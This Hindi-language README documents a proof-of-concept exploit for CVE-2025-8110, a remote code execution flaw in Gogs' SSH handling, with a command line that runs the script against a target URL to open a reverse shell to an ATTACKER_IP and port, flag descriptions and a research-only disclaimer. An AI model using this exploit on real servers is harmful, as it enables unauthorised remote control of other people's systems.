
CVE-2025-8110 PoC
इस रिपॉजिटरी में CVE-2025-8110 के लिए एक प्रमाण-परीक्षण (PoC) शामिल है, जो Gogs में एक रिमोट कोड निष्पादन (RCE) भेद्यता है। यह शोषण आंतरिक SSH सर्वर कार्यान्वयन को लक्षित करता है, जिससे हमलावर sshCommand कॉन्फ़िगरेशन के माध्यम से दुर्भावनापूर्ण कमांड इंजेक्ट कर सकते हैं।
शोषण चलाने के लिए, लक्ष्य Gogs URL और रिवर्स शेल के लिए अपने सुनने वाले होस्ट/पोर्ट के साथ CVE-2025-8110.py स्क्रिप्ट का उपयोग करें।
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>
-u, --url: लक्ष्य Gogs इंस्टेंस का बेस URL (जैसे, http://localhost:3000)।-lh, --host: वह IP पता जहाँ रिवर्स शेल को वापस कनेक्ट करना चाहिए।-lp, --port: वह पोर्ट जहाँ रिवर्स शेल को वापस कनेक्ट करना चाहिए।-x, --proxy: (वैकल्पिक) डिबगिंग के लिए http://localhost:8080 पर एक स्थानीय प्रॉक्सी का उपयोग करें।यह प्रमाण-परीक्षण (PoC) केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। इसका उद्देश्य सुरक्षा शोधकर्ताओं और प्रशासकों को CVE-2025-8110 भेद्यता को समझने और कम करने में मदद करना है।
लेखक इस कोड के किसी भी अनधिकृत या दुर्भावनापूर्ण उपयोग के लिए कोई जिम्मेदारी नहीं लेता है। इस उपकरण का उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है। इस कोड का उपयोग करके, आप अपने कार्यों की पूरी जिम्मेदारी लेने के लिए सहमत हैं।